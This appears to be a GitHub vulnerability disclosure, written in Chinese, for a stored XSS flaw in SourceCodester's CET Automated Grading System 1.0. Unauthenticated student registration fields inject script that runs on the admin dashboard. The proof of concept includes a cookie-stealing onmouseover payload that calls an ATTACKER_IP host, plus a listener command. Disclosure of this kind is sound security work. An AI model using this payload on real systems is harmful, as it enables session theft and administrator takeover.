Xmyronn/CVE-2026-7401-XSS

GitHub: Xmyronn/CVE-2026-7401-XSS

披露了 CET 自动评分系统 1.0 中一处高危存储型 XSS 漏洞的完整 PoC,展示了未认证攻击者如何通过学生注册字段注入恶意脚本并劫持管理员会话。

Stars: 0 | Forks: 0

# CET 自动评分系统中的存储型 XSS — 学生注册 (未认证 → 管理员控制面板) ## 详情 | 字段 | 值 | |---|---| | **供应商** | SourceCodester | | **供应商 URL** | https://www.sourcecodester.com | | **产品** | CET Automated Grading System with AI Predictive Analytics in PHP and MySQL | | **产品 URL** | https://www.sourcecodester.com/php/18686/cet-automated-grading-system-ai-predictive-analytics-php-and-mysql.html | | **版本** | 1.0 | | **漏洞** | 存储型跨站脚本攻击 (XSS) | | **CWE** | CWE-79 | | **CVSSv3 评分** | 8.8 (高危) | | **攻击向量** | 网络 | | **需要认证** | 否 (学生自助注册是公开的) | | **受害者** | 管理员 | | **用户交互** | 需要 (管理员访问控制面板) | | **研究员** | Imad Alvi | | **日期** | 2026-04-13 | ## 受影响组件 **文件:** `PersonalAGS/index.php?action=register` (学生注册) **参数:** `student_id`, `full_name`, `section`, `username` (POST) **触发位置:** `PersonalAGS/index.php?action=dashboard` (管理员控制面板) ## 描述 CET 自动评分系统 1.0 中的学生自助注册门户在将用户提供的输入存入数据库之前,未能进行清理或编码操作。未经认证的攻击者可以在任何注册字段中注入 JavaScript 负载来注册学生账户。恶意负载被存储在数据库中,并在任何访问列有已注册学生控制面板的管理员浏览器中执行。 这是一个关键的攻击链 —— 注入负载不需要任何认证,但它会在具有高权限的管理员上下文中执行,从而实现会话 cookie 窃取和完全接管管理员账户。 ## 概念验证 ### 步骤 1 — 导航到学生注册 (无需认证) 导航到公开的学生自助注册页面: ``` http://localhost/cet-personalagms/PersonalAGS/index.php?action=register ``` ### 步骤 2 — 在注册字段中注入 XSS 负载 在所有字段中填入 XSS 负载并点击 **Register Account**: - **Student ID Number:** `">` - **Full Name:** `">` - **Section:** `">` - **Desired Username:** `">` Screenshot 2026-04-13 030707 注册成功 —— 负载被存储在数据库中。 ### 步骤 3 — 管理员控制面板触发 XSS 当管理员登录并访问控制面板时,注入的负载会立即执行。警告弹窗被触发,并且页面布局被注入的 HTML 明显破坏 —— 这证实了负载在管理面板中未经清理就被渲染出来。 控制面板的章节标题也反映了注入的值: - `1ST YEAR - SECTION 1ST YEAR" ONMOUSEOVE` - `3RD YEAR - SECTION " ONLOAD=ALERT(1) X=` Screenshot 2026-04-13 030717 ## 会话劫持负载 攻击者可以通过在注册字段中使用以下负载,将此漏洞升级为完全的管理员会话劫持: ``` " onmouseover="new Image().src='http://ATTACKER_IP:8888/?c='+document.cookie" x=" ``` 在攻击者机器上设置监听器: ``` python3 -m http.server 8888 ``` 当管理员访问控制面板时,其会话 cookie 将被发送到攻击者的服务器,从而实现完全的账户接管。 ## 影响 未经认证的攻击者可以: - 通过公开的学生注册向管理员控制面板注入持久性 JavaScript - 窃取管理员的会话 cookie 并接管管理员账户 - 代表受害者执行任何管理员操作 - 将管理员重定向到恶意页面 - 篡改管理员控制面板 注入负载不需要任何认证。当任何管理员访问控制面板时,攻击会自动执行。 ## 参考 - [SourceCodester — CET 自动评分系统](https://www.sourcecodester.com/php/18686/cet-automated-grading-system-ai-predictive-analytics-php-and-mysql.html) - CWE-79:在生成网页期间对输入的不正确中和。
标签:AI预测分析, AppImage, CET Automated Grading System, CISA项目, Cookie窃取, CVSS 8.8, CWE-79, OpenVAS, PHP, Session劫持, SourceCodester, SQL注入防护, WAF, Web安全, Web应用防火墙, XSS, 协议分析, 存储型XSS, 数据可视化, 未授权攻击, 权限提升, 漏洞情报, 漏洞披露, 管理员接管, 自动评分系统, 蓝队分析, 跨站脚本攻击, 输入校验缺失